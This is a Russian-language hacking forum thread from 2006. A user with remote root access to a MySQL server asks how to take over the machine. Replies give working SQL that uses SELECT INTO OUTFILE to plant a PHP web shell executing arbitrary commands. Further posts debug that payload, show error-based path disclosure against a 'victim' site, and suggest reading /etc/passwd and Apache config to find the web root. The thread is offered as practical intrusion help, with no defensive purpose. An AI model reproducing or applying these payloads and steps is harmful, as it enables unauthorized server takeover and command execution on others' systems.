ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Зашёл удолёно на MySql под root. Подскажите как захватить сервак.
  #1  
Старый 04.06.2006, 00:50
Аватар для faust45
faust45
Познающий
Регистрация: 02.03.2006
Сообщений: 43
Провел на форуме:
132146

Репутация: 0
По умолчанию Зашёл удолёно на MySql под root. Подскажите как захватить сервак.

Я думал скрипт залить но как я потом его вызову ?
Думал может в таблицы какието файлы по заливать а потом почитать их но как
заливать данные из таблиц
Помогите пожалуйста.
 
Ответить с цитированием

  #2  
Старый 04.06.2006, 00:53
Аватар для Desr0w
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553

Репутация: 319


Отправить сообщение для Desr0w с помощью ICQ
По умолчанию

CREATE TABLE `shell` (s TEXT);
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
SELECT `s` INTO OUTFILE '/svoi/puti/k/saity/shell.php' FROM `shell`;
DROP TABLE `shell`;
 
Ответить с цитированием

  #3  
Старый 04.06.2006, 01:02
Аватар для faust45
faust45
Познающий
Регистрация: 02.03.2006
Сообщений: 43
Провел на форуме:
132146

Репутация: 0
По умолчанию

ето ты конечно ловко придумал:
SELECT `s` INTO OUTFILE '/svoi/puti/k/saity/shell.php' FROM `shell`;

только вот как узнать полные пути к катологам в которых разрешено выполнение скриптов?
 
Ответить с цитированием

  #4  
Старый 04.06.2006, 05:24
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

Попробуй на самом серваке скрипты пощупать. Может удача улыбнёться и ты увидишь северный путь :d
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #5  
Старый 04.06.2006, 05:38
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

У меян короче такой же косяк. Я короче путь знаю всё когда прописываю выдаёт следующее "You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '; INSERT INTO `shell` values (''); SEL". Я в скулях особо не разбираюсь но скажите мне что за ошибка?
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #6  
Старый 04.06.2006, 05:38
Аватар для Desr0w
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553

Репутация: 319


Отправить сообщение для Desr0w с помощью ICQ
По умолчанию

victim.ru/check.php=into
Это просто глупый пример,попробуй вместо into подставить ' ,если будет ошибка узнаешь часть серв. пути.
victim.ru/check.php='
 
Ответить с цитированием

  #7  
Старый 04.06.2006, 09:48
Аватар для K[o]S
K[o]S
Новичок
Регистрация: 29.07.2005
Сообщений: 20
Провел на форуме:
357093

Репутация: 13
По умолчанию

Цитата:
Сообщение от SanyaX  
У меян короче такой же косяк. Я короче путь знаю всё когда прописываю выдаёт следующее "You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '; INSERT INTO `shell` values (''); SEL". Я в скулях особо не разбираюсь но скажите мне что за ошибка?
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
замени на
INSERT INTO `s` values ('<? passthru("$cmd"); ?>');
 
Ответить с цитированием

  #8  
Старый 04.06.2006, 10:45
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

Цитата:
Сообщение от K[o]S  
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
замени на
INSERT INTO `s` values ('<? passthru("$cmd"); ?>');
А разницы? лучше не стало такая же ошибка. Использую скрипт от rst.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #9  
Старый 04.06.2006, 10:49
Аватар для Trinux
Trinux
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818

Репутация: 569


По умолчанию

2 SanyaX
версия твоего мускуля не поддерживает выполнение нескольких sql запросов через ; вот и все... насколько я понимаю
 
Ответить с цитированием

  #10  
Старый 04.06.2006, 11:44
Аватар для ZaCo
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

ну можно например из /etc/passwd узнать путь к апачу. оттуда по всем извесным относительным путям conf/httpd.conf узнаешь путь к директории со скриптами. санякс пока ни одна версия мускля не обрабатывает запрос после ; по-крайней мере пхп библиотека для работы с мускл сервером за один mysql_query этого не позволяет.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Посимвольный перебор в базах данных на примере MySQL LoFFi Чужие Статьи 5 30.04.2007 05:05
Помогите откомпилить!! LoFFi Уязвимости 19 19.03.2006 22:56
Общие Рекомендации Защиты (MySQL и SQL Web-интерфейс) k00p3r Чужие Статьи 0 13.06.2005 11:22
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ